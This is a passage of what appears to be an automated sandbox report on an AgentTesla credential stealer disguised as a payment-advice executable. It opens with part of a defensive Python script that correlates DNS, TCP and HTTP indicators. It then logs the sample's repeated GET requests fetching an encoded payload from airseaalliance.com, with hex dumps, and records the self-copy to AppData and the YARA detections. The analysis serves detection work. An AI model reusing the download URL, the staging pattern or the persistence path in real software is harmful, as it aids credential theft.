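        flow = flows.setdefault(remote, {"packets": 0, "first_seen": when})
        flow["packets"] += 1
        flow["first_seen"] = min(flow["first_seen"], when)
    return flows


def correlate(dns_text, tcp_text, sandbox_host=SANDBOX_HOST):
    names, answered_at = parse_dns_answers(dns_text)
    flows = parse_tcp_rows(tcp_text, sandbox_host)
    for (ip, _port), flow in flows.items():
        flow["domains"] = set(names.get(ip, ()))
        # An address never handed out by DNS, or contacted before the answer
        # arrived, was hard-coded in the sample rather than resolved.
        flow["resolved_before"] = ip in answered_at and answered_at[ip] <= flow["first_seen"]
    unused = set(names) - {ip for ip, _ in flows}
    return {"contacted": flows, "resolved_unused": unused}


def parse_http(raw):
    """Split a raw HTTP message into its start line and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    headers = {k.strip().lower(): v.strip() for k, v in (h.split(":", 1) for h in head[1:])}
    return head[0], headers


def http_indicators(request, response):
    """Pull the fields worth blocking or hunting on out of one HTTP exchange."""
    req_line, req_hdrs = parse_http(request)
    _status, resp_hdrs = parse_http(response)
    method, uri, _version = req_line.split(" ", 2)
    return {
        "url": f"http://{req_hdrs.get('host', '')}{uri}",
        "method": method,
        # browsers always send one; a bare .NET WebClient does not
        "no_user_agent": "user-agent" not in req_hdrs,
        "bytes": int(resp_hdrs.get("content-length", 0)),
    }


if __name__ == "__main__":
    result = correlate(DNS_ANSWERS, TCP_ROWS)
    for (ip, port), f in sorted(result["contacted"].items(), key=lambda kv: kv[1]["first_seen"]):
        doms = ", ".join(sorted(f["domains"])) or "(no DNS answer)"
        print(f"{ip}:{port}  {f['packets']} pkts  {doms}  dns_first={f['resolved_before']}")
    for ip in sorted(result["resolved_unused"]):
        print(f"{ip}  resolved but never contacted")
    print(http_indicators(HTTP_REQUEST, HTTP_RESPONSE))
```

Run stand-alone it lists 162.159.136.232:443 (discord.com) and 198.136.51.123:80 (airseaalliance.com), both resolved before first contact, the four unused discord.com addresses, and the fetched URL with its 1114112-byte response and missing User-Agent header. To apply it to another report, export the three tables with the same column order; the `resolved_before` flag is the quickest way to spot a hard-coded C2 address that the DNS tables will never show.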

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • airseaalliance.com

                                                                                                            HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49708 | 198.136.51.123 | 80 | C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe

Timestamp | kBytes transferred | Direction | Data
Nov 21, 2020 21:00:58.233391047 CET | 1 | OUT | GET /wp-admin/twenty-seventeen/70099875453/css/Ucll08488374ODU8 HTTP/1.1
Host: airseaalliance.com
Cache-Control: no-cache
Nov 21, 2020 21:00:58.360580921 CET | 2 | IN | HTTP/1.1 200 OK
Date: Sat, 21 Nov 2020 20:00:58 GMT
Server: Apache
Last-Modified: Sat, 21 Nov 2020 16:31:03 GMT
ETag: "4eb261-110000-5b4a07cb11235"
Accept-Ranges: bytes
Content-Length: 1114112
                                                                                                            Data Raw: 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 64 37 39 33 31 30 35 33 37 33 30 32 63 37 66 31 64 35 63 31 39 33 39 31 62 36 66 32 63 35 39 35 63 37 64 35 32 33 34 33 66 33 30 33 66 34 64 34 30 37 39 35 37 32 63 33 31 32 36 33 30 35 37 37 63 37 65 35 34 37 62 37 39 37 37 37 35 31 65 31 38 37 39 35 36 30 66 30 33 36 35 36 30 31 33 31 30 36 62 35 64 37 39 37 63 30 36 31 63 36 65 36 63 37 33 35 36 31 66 37 37 31 37 31 39 30 37 37 61 31 39 35 34 37 32 37 63 30 36 36 62 31 36 31 36 30 61 34 62 37 33 37 30 30 62 
36 31 36 39 36 38 31 64 35 34 37 65 37 37 31 39 36 66 31 62 31 65 37 35 32 65 30 62 30 31 30 39 36 66 37 39 31 30 36 65 32 62 36 64 31 37 36 36 36 39 31 64 31 30 37 39 35 31 37 36 37 33 37 65 37 32 31 39 31 36 37 34 35 34 30 39 30 38 36 64 36 34 31 66 31 37 36 65 35 30 37 33 37 35 30 31 31 62 36 30 36 31 37 31 35 30 31 34 37 66 31 33 31 35 30 30 37 66 31 34 35 65 37 62 37 62 30 31 36 35 31 62 31 34 30 63 34 30 37 62 37 34 30 37 36 36 36 63 36 35 31 37 35 64 37 39 37 30 31 37 36 32 31 39 31 38 37 65 32 36 30 66 30 64 30 65 36 61 37 34 31 61 36 37 32 63 36 61 31 39 36 62 36 62 31 62 31 62 37 31 35 35 37 61 37 34 37 62 37 66 31 33 31 66 37 33 35 33 30 37 30 35 36 66 36 32 31 34 31 66 36 61 35 63 37 34 37 30 30 63 31 31 36 39 36 36 37 36 35 65 31 39 37 64 31 35 31 65 30 38 37 62 31 38 35 39 37 65 37 61 32 36 32 63 35 64 36 34 37 36 35 64 37 39 37 35 37 61 37 32 31 33 31 30 37 62 35 64 30 64 30 64 36 33 36 62 31 62 31 38 36 32 35 66 37 35 37 31 30 31 31 31 36 36 36 65 37 38 35 34 31 31 37 31 31 63 31 31 30 66 37 33 31 62 35 38 37 66 37 62 37 61 37 30 30 32 30 61 37 63 35 35 37 35 37 63 37 35 37 35 31 62 31 33 37 61 35 63 30 30 30 64 36 63 36 33 31 35 31 32 36 61 35 33 37 63 37 65 30 36 31 39 36 35 36 66 37 39 35 39 31 31 37 65 31 34 31 66 30 35 37 62 31 37 35 31 37 30 37 34 36 39 61 62 31 39 35 32 36 36 63 36 63 36 36 32 66 32 63 64 62 36 62 64 62 38 39 37 30 30 31 64 66 62 63 30 36 35 31 64 62 37 35 30 33 65 30 66 65 38 64 33 34 65 64 61 36 31 36 64 65 35 32 31 61 66 66 36 62 34 62 39 61 61 31 35 63 30 63
                                                                                                            Data Ascii: 70c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706d79310537302c7f1d5c19391b6f2c595c7d52343f303f4d4079572c312630577c7e547b7977751e1879560f03656013106b5d797c061c6e6c73561f771719077a1954727c066b16160a4b73700b6169681d547e77196f1b1e752e0b01096f79106e2b6d1766691d10795176737e721916745409086d641f176e507375011b60617150147f1315007f145e7b7b01651b140c407b7407666c65175d7970176219187e260f0d0e6a741a672c6a196b6b1b1b71557a747b7f131f735307056f62141f6a5c74700c116966765e197d151e087b18597e7a262c5d64765d79757a7213107b5d0d0d636b1b18625f75710111666e785411711c110f731b587f7b7a70020a7c55757c75751b137a5c000d6c6315126a537c7e0619656f7959117e141f057b1751707469ab195266c6c662f2cdb6bdb897001dfbc0651db7503e0fe8d34eda616de521aff6b4b9aa15c0c


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49734 | 198.136.51.123 | 80 | C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe

Timestamp | kBytes transferred | Direction | Data
Nov 21, 2020 21:01:50.377927065 CET | 1503 | OUT | GET /wp-admin/twenty-seventeen/70099875453/css/Ucll08488374ODU8 HTTP/1.1
Host: airseaalliance.com
Cache-Control: no-cache
Nov 21, 2020 21:01:50.505517006 CET | 1505 | IN | HTTP/1.1 200 OK
Date: Sat, 21 Nov 2020 20:01:50 GMT
Server: Apache
Last-Modified: Sat, 21 Nov 2020 16:31:03 GMT
ETag: "4eb261-110000-5b4a07cb11235"
Accept-Ranges: bytes
Content-Length: 1114112
                                                                                                            Data Raw: 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 64 37 39 33 31 30 35 33 37 33 30 32 63 37 66 31 64 35 63 31 39 33 39 31 62 36 66 32 63 35 39 35 63 37 64 35 32 33 34 33 66 33 30 33 66 34 64 34 30 37 39 35 37 32 63 33 31 32 36 33 30 35 37 37 63 37 65 35 34 37 62 37 39 37 37 37 35 31 65 31 38 37 39 35 36 30 66 30 33 36 35 36 30 31 33 31 30 36 62 35 64 37 39 37 63 30 36 31 63 36 65 36 63 37 33 35 36 31 66 37 37 31 37 31 39 30 37 37 61 31 39 35 34 37 32 37 63 30 36 36 62 31 36 31 36 30 61 34 62 37 33 37 30 30 62 
36 31 36 39 36 38 31 64 35 34 37 65 37 37 31 39 36 66 31 62 31 65 37 35 32 65 30 62 30 31 30 39 36 66 37 39 31 30 36 65 32 62 36 64 31 37 36 36 36 39 31 64 31 30 37 39 35 31 37 36 37 33 37 65 37 32 31 39 31 36 37 34 35 34 30 39 30 38 36 64 36 34 31 66 31 37 36 65 35 30 37 33 37 35 30 31 31 62 36 30 36 31 37 31 35 30 31 34 37 66 31 33 31 35 30 30 37 66 31 34 35 65 37 62 37 62 30 31 36 35 31 62 31 34 30 63 34 30 37 62 37 34 30 37 36 36 36 63 36 35 31 37 35 64 37 39 37 30 31 37 36 32 31 39 31 38 37 65 32 36 30 66 30 64 30 65 36 61 37 34 31 61 36 37 32 63 36 61 31 39 36 62 36 62 31 62 31 62 37 31 35 35 37 61 37 34 37 62 37 66 31 33 31 66 37 33 35 33 30 37 30 35 36 66 36 32 31 34 31 66 36 61 35 63 37 34 37 30 30 63 31 31 36 39 36 36 37 36 35 65 31 39 37 64 31 35 31 65 30 38 37 62 31 38 35 39 37 65 37 61 32 36 32 63 35 64 36 34 37 36 35 64 37 39 37 35 37 61 37 32 31 33 31 30 37 62 35 64 30 64 30 64 36 33 36 62 31 62 31 38 36 32 35 66 37 35 37 31 30 31 31 31 36 36 36 65 37 38 35 34 31 31 37 31 31 63 31 31 30 66 37 33 31 62 35 38 37 66 37 62 37 61 37 30 30 32 30 61 37 63 35 35 37 35 37 63 37 35 37 35 31 62 31 33 37 61 35 63 30 30 30 64 36 63 36 33 31 35 31 32 36 61 35 33 37 63 37 65 30 36 31 39 36 35 36 66 37 39 35 39 31 31 37 65 31 34 31 66 30 35 37 62 31 37 35 31 37 30 37 34 36 39 61 62 31 39 35 32 36 36 63 36 63 36 36 32 66 32 63 64 62 36 62 64 62 38 39 37 30 30 31 64 66 62 63 30 36 35 31 64 62 37 35 30 33 65 30 66 65 38 64 33 34 65 64 61 36 31 36 64 65 35 32 31 61 66 66 36 62 34 62 39 61 61 31 35 63 30 63
                                                                                                            Data Ascii: 70c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706d79310537302c7f1d5c19391b6f2c595c7d52343f303f4d4079572c312630577c7e547b7977751e1879560f03656013106b5d797c061c6e6c73561f771719077a1954727c066b16160a4b73700b6169681d547e77196f1b1e752e0b01096f79106e2b6d1766691d10795176737e721916745409086d641f176e507375011b60617150147f1315007f145e7b7b01651b140c407b7407666c65175d7970176219187e260f0d0e6a741a672c6a196b6b1b1b71557a747b7f131f735307056f62141f6a5c74700c116966765e197d151e087b18597e7a262c5d64765d79757a7213107b5d0d0d636b1b18625f75710111666e785411711c110f731b587f7b7a70020a7c55757c75751b137a5c000d6c6315126a537c7e0619656f7959117e141f057b1751707469ab195266c6c662f2cdb6bdb897001dfbc0651db7503e0fe8d34eda616de521aff6b4b9aa15c0c


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49739 | 198.136.51.123 | 80 | C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe

Timestamp | kBytes transferred | Direction | Data
Nov 21, 2020 21:01:58.814641953 CET | 2737 | OUT | GET /wp-admin/twenty-seventeen/70099875453/css/Ucll08488374ODU8 HTTP/1.1
Host: airseaalliance.com
Cache-Control: no-cache
Nov 21, 2020 21:01:58.941955090 CET | 2739 | IN | HTTP/1.1 200 OK
Date: Sat, 21 Nov 2020 20:01:58 GMT
Server: Apache
Last-Modified: Sat, 21 Nov 2020 16:31:03 GMT
ETag: "4eb261-110000-5b4a07cb11235"
Accept-Ranges: bytes
Content-Length: 1114112
                                                                                                            Data Raw: 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 64 37 39 33 31 30 35 33 37 33 30 32 63 37 66 31 64 35 63 31 39 33 39 31 62 36 66 32 63 35 39 35 63 37 64 35 32 33 34 33 66 33 30 33 66 34 64 34 30 37 39 35 37 32 63 33 31 32 36 33 30 35 37 37 63 37 65 35 34 37 62 37 39 37 37 37 35 31 65 31 38 37 39 35 36 30 66 30 33 36 35 36 30 31 33 31 30 36 62 35 64 37 39 37 63 30 36 31 63 36 65 36 63 37 33 35 36 31 66 37 37 31 37 31 39 30 37 37 61 31 39 35 34 37 32 37 63 30 36 36 62 31 36 31 36 30 61 34 62 37 33 37 30 30 62 
36 31 36 39 36 38 31 64 35 34 37 65 37 37 31 39 36 66 31 62 31 65 37 35 32 65 30 62 30 31 30 39 36 66 37 39 31 30 36 65 32 62 36 64 31 37 36 36 36 39 31 64 31 30 37 39 35 31 37 36 37 33 37 65 37 32 31 39 31 36 37 34 35 34 30 39 30 38 36 64 36 34 31 66 31 37 36 65 35 30 37 33 37 35 30 31 31 62 36 30 36 31 37 31 35 30 31 34 37 66 31 33 31 35 30 30 37 66 31 34 35 65 37 62 37 62 30 31 36 35 31 62 31 34 30 63 34 30 37 62 37 34 30 37 36 36 36 63 36 35 31 37 35 64 37 39 37 30 31 37 36 32 31 39 31 38 37 65 32 36 30 66 30 64 30 65 36 61 37 34 31 61 36 37 32 63 36 61 31 39 36 62 36 62 31 62 31 62 37 31 35 35 37 61 37 34 37 62 37 66 31 33 31 66 37 33 35 33 30 37 30 35 36 66 36 32 31 34 31 66 36 61 35 63 37 34 37 30 30 63 31 31 36 39 36 36 37 36 35 65 31 39 37 64 31 35 31 65 30 38 37 62 31 38 35 39 37 65 37 61 32 36 32 63 35 64 36 34 37 36 35 64 37 39 37 35 37 61 37 32 31 33 31 30 37 62 35 64 30 64 30 64 36 33 36 62 31 62 31 38 36 32 35 66 37 35 37 31 30 31 31 31 36 36 36 65 37 38 35 34 31 31 37 31 31 63 31 31 30 66 37 33 31 62 35 38 37 66 37 62 37 61 37 30 30 32 30 61 37 63 35 35 37 35 37 63 37 35 37 35 31 62 31 33 37 61 35 63 30 30 30 64 36 63 36 33 31 35 31 32 36 61 35 33 37 63 37 65 30 36 31 39 36 35 36 66 37 39 35 39 31 31 37 65 31 34 31 66 30 35 37 62 31 37 35 31 37 30 37 34 36 39 61 62 31 39 35 32 36 36 63 36 63 36 36 32 66 32 63 64 62 36 62 64 62 38 39 37 30 30 31 64 66 62 63 30 36 35 31 64 62 37 35 30 33 65 30 66 65 38 64 33 34 65 64 61 36 31 36 64 65 35 32 31 61 66 66 36 62 34 62 39 61 61 31 35 63 30 63
                                                                                                            Data Ascii: 70c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706d79310537302c7f1d5c19391b6f2c595c7d52343f303f4d4079572c312630577c7e547b7977751e1879560f03656013106b5d797c061c6e6c73561f771719077a1954727c066b16160a4b73700b6169681d547e77196f1b1e752e0b01096f79106e2b6d1766691d10795176737e721916745409086d641f176e507375011b60617150147f1315007f145e7b7b01651b140c407b7407666c65175d7970176219187e260f0d0e6a741a672c6a196b6b1b1b71557a747b7f131f735307056f62141f6a5c74700c116966765e197d151e087b18597e7a262c5d64765d79757a7213107b5d0d0d636b1b18625f75710111666e785411711c110f731b587f7b7a70020a7c55757c75751b137a5c000d6c6315126a537c7e0619656f7959117e141f057b1751707469ab195266c6c662f2cdb6bdb897001dfbc0651db7503e0fe8d34eda616de521aff6b4b9aa15c0c


Code Manipulations

Statistics

Behavior


System Behavior

General

Start time: 21:00:56
Start date: 21/11/2020
Path: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe'
Imagebase: 0x7ffb73670000
File size: 881008 bytes
MD5 hash: 947EDEB169369AC67C5448CC2F8104A3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Reputation: low

General

Start time: 21:01:35
Start date: 21/11/2020
Path: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe
Imagebase: 0x7ffb73670000
File size: 881008 bytes
MD5 hash: 947EDEB169369AC67C5448CC2F8104A3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.472146872.00000000026A7000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.472146872.00000000026A7000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.468175139.00000000023E0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000003.281256788.00000000006D0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.477031647.0000000004A10000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.467456643.0000000002154000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.473405683.00000000035D1000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 21:01:48
Start date: 21/11/2020
Path: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe'
Imagebase: 0x400000
File size: 881008 bytes
MD5 hash: 947EDEB169369AC67C5448CC2F8104A3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Yara matches:
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000D.00000002.362836092.0000000002AC7000.00000020.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000D.00000002.362836092.0000000002AC7000.00000020.00000001.sdmp, Author: @itsreallynick (Nick Carr)
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 23%, ReversingLabs
Reputation: low

General

Start time: 21:01:56
Start date: 21/11/2020
Path: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe'
Imagebase: 0x400000
File size: 881008 bytes
MD5 hash: 947EDEB169369AC67C5448CC2F8104A3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Reputation: low

General

Start time: 21:02:11
Start date: 21/11/2020
Path: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe
Imagebase: 0x400000
File size: 881008 bytes
MD5 hash: 947EDEB169369AC67C5448CC2F8104A3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.469055192.00000000025F0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000003.358872577.0000000000852000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.474318013.00000000036C1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.468146329.00000000021D4000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.477297812.0000000004F00000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

Disassembly

Code Analysis
